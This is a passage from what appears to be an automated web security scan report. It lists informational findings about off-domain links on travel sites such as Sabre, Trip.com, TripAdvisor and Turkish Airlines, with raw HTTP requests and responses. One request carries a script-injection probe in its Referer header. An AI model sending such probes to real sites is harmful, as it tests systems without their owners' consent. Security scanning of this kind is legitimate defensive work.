User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17374


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</div>        
               <object id="flash" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="2000" height="600">
                   <param name="movie" value="/flash/home-masthead.swf" />
...[SNIP]...
<li id="utility-sabre"><a href="http://sabre-holdings.com/">Sabre Holdings</a>
...[SNIP]...
<li id="follow-facebook"><a href="http://www.facebook.com/SabreHospitality" class="track" name="follow:facebook" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-twitter"><a href="http://twitter.com/SabreHosp" class="track" name="follow:twitter" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-linked"><a target="_blank" href="http://www.linkedin.com/companies/sabre-hospitality-solutions" class="track" name="follow:linkedin"><span class="alt">
...[SNIP]...
</strong> While using our site, you may encounter some trouble along the way. For PC users, we recommend upgrading to the latest version of <a href="http://www.microsoft.com/windows/products/winfamily/ie/default.mspx" rel="nofollow">Internet Explorer</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>. For Mac users, we recommend the latest version of <a href="http://www.apple.com/macosx/features/safari/" rel="nofollow">Safari</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...

19.242. http://www.sabretravelnetwork.com/home/search/show_results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...
<li><a href="http://www.sabretravelnetwork.ru" class="ex">..............</a>
...[SNIP]...
</span><a href="http://www.abacus.com.sg" class="ex"> Abacus - English</a>
...[SNIP]...
</span> <a href="http://www.sabrepacific.com.au" class="ex">Sabre Pacific - English</a>
...[SNIP]...
<p>Calculate and compare fee totals from the most popular airlines in the US. <a href="http://www.exploreflightfees.com/">Bookmark Us</a>
...[SNIP]...
<p>Committed to minimizing the environmental impact of our global operations and to promoting sustainable business practices in travel and tourism. <a href="http://www.sabre-holdings.com/aboutUs/corporate/sustainability.html">www.sabre-holdings.com</a>
...[SNIP]...
</a>
           <a href="http://www.sabre-holdings.com/careers/index.html" class="right">Careers</a>
           <a href="http://www.sabre-holdings.com" class="right">Sabre Holdings</a>
...[SNIP]...

19.243. http://www.travelocity.com/popWindow2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:50 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
</div>

   <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jQuery/1.4.3/jquery-1.4.3.min.js"></script>
...[SNIP]...

19.244. http://www.trip.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:01 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "ab4c-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 43852
Content-Type: text/html
Cache-Control: private
Content-Length: 43852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Cheap Flights, Hotels &amp; Trips | Trip.com</title>
...[SNIP]...
<meta name="msvalidate.01" content="F4183A542954B39E862C81CCFCEDFA0E" />
<link rel="stylesheet" href="http://media.away.com/trip/css/trip-landing-min.css" type="text/css" />
<script type="text/javascript">
...[SNIP]...
</script>    
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<noscript>
<a href="http://www.revresda.com/click.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=728x90%26keyword=%26CookieName=awyprd%26language=en_US">
<img src="http://www.revresda.com/image.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=728x90%26keyword=%26CookieName=awyprd%26language=en_US"/>
</a>
...[SNIP]...
<a href="/"><img src="http://media.away.com/trip/images/logos/trip-99x72-suitcase.png" alt="Trip.com logo" width="99" height="72"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/08/insider-tips-for-a-goa-trip.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b014e8aac1e5c970d-120wi.jpg" alt="" width="120" height="80"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/08/qa-with-a-bangalore-expert-jodi-dell-leblanc-taj-hotels-resorts-and-palaces.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b014e8a67a7e6970d-120wi.jpg" alt="" width="120" height="90"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/07/riviera-maya-with-kids.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b015433fcded7970c-120wi.jpg" alt="" width="120" height="64"></a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.orbitz.com/">hotels</a>
...[SNIP]...
<li>Find <a target="_blank" href="http://www.cheaptickets.com/">cheap flights</a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.hotelclub.com/">Cheap Hotels</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ratestogo.com/">Last Minute Hotel Deals</a>
...[SNIP]...
<li>Research <a target="_blank" href="http://www.gorp.com/">national parks</a>
...[SNIP]...
<li>Get <a target="_blank" href="http://www.lodging.com/">lodging deals</a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.ebookers.com/">cheap hotels</a>
...[SNIP]...
<li><a href="http://careers.orbitz.com/" rel="nofollow">Careers</a>
...[SNIP]...
<li><a href="http://corp.orbitz.com/advertise/away" rel="nofollow">Advertise With Us</a>
...[SNIP]...
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-ceOUGeqFtBlUY.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
...[SNIP]...
<div class="TAN-footerlogo"><img src="http://media.away.com/away/images/comscore/away-96x39-808080.gif" alt="Away.com logo" width="96" height="39" id="TAN-awaylogo"></div>
       <div class="TAN-footerlogo "><img src="http://media.away.com/away/images/comscore/gorp-56x40-808080.gif" alt="Gorp.com logo" width="56" height="40" id="TAN-gorplogo"></div>
       <div class="TAN-footerlogo TAN-roundright"><img src="http://media.away.com/away/images/comscore/af-152x27-808080.gif" alt="GorpTravel.com logo" width="152" height="27" id="TAN-gtlogo"></div>
...[SNIP]...
<div><img src="http://media.away.com/away/images/comscore/trip-56x42-B82F25.gif" alt="Trip.com logo" width="56" height="42" id="TAN-triplogo"></div></div>
       <div class="TAN-footerlogo TAN-roundleft"><img src="http://media.away.com/away/images/comscore/lodging-129x31-808080.gif" alt="Lodging.com logo" width="129" height="31" id="TAN-lodginglogo"></div>
       <div class="TAN-footerlogo"><img src="http://media.away.com/away/images/comscore/away-footer-filler.gif" alt="The Away Network" width="95" height="35" id="TAN-oollogo"></div>
       <div class="TAN-label"><img src="http://media.away.com/away/images/comscore/the-away-network.gif" alt="The Away Network" width="135" height="39"></div>
...[SNIP]...
<div class="esc-image"><img src="http://media.away.com/trip/images/esclamation.gif" /></div>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...

19.245. http://www.trip.com/box_ad_refresh.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...
<noscript>
   <a href="http://www.revresda.com/click.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=336x280%26keyword=%26CookieName=awyprd%26language=en_US">
<img src="http://www.revresda.com/image.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=336x280%26keyword=%26CookieName=awyprd%26language=en_US"/>
</a>
...[SNIP]...

19.246. http://www.tripadvisor.com/CheckMore

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...
dia', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Expedia.com-v2.gif" height="33" alt="Expedia.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
Com', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/B.com_logo.gif" height="33" alt="Booking.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
om2', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Hotels.com-v1.gif" height="33" alt="Hotels.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
otelsLOWUS', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount defaultStyle sprite-genericBGBtn custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Venere.gif" height="33" alt="Venere.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_321151 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '321151', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_94337 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '94337', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_89575 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest cmAVTest cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '89575', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...

19.247. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=checkin HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3203


<form id="step-2" action="https://www4.thy.com/onlinecheckin/checkpax.tk?lang=en" method="post" class="validate" rel="test">
<div class="title">Check-in</div>
<div class="quick_search-online">

...[SNIP]...
<input id="eticketname" name="eticketname" tabindex=3 class="small fv-group" value="" maxlength="13" />
<a class="fancybox iframe" href="http://www4.thy.com/images/onlinecheckin/en/pnr.htm" style="float: left; height:25px; display:block;"><span class="ui-icons ui-icons-help float_left">
...[SNIP]...
<input id="pnr" name="pnr" tabindex=4 class="small fv-group" value="" maxlength="6" />
<a class="fancybox iframe" href="http://www4.thy.com/images/onlinecheckin/en/pnr.htm" style="float: left; height:25px; display:block;"><span class="ui-icons ui-icons-help float_left">
...[SNIP]...
<p>
<a class="fancybox iframe underlined" href="http://www4.thy.com/onlinecheckin/stations.tk?lang=en">to learn airports list online flight card service is available</a><br/>
<a class="fancybox iframe underlined" href="http://www4.thy.com/onlinecheckin/obpstations.tk?lang=en"></a>
...[SNIP]...

19.248. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
<div class="float-left">If you have forgotten your PIN <a href="https://www4.thy.com/tkmiles/pinproblems.tk?lang=en" class="float_left red">click here</a>
...[SNIP]...
<div style="margin-top:10px;">
To Become a member click <a href="https://www4.thy.com/tkmiles/newmember.tk?lang=en">here</a>
...[SNIP]...

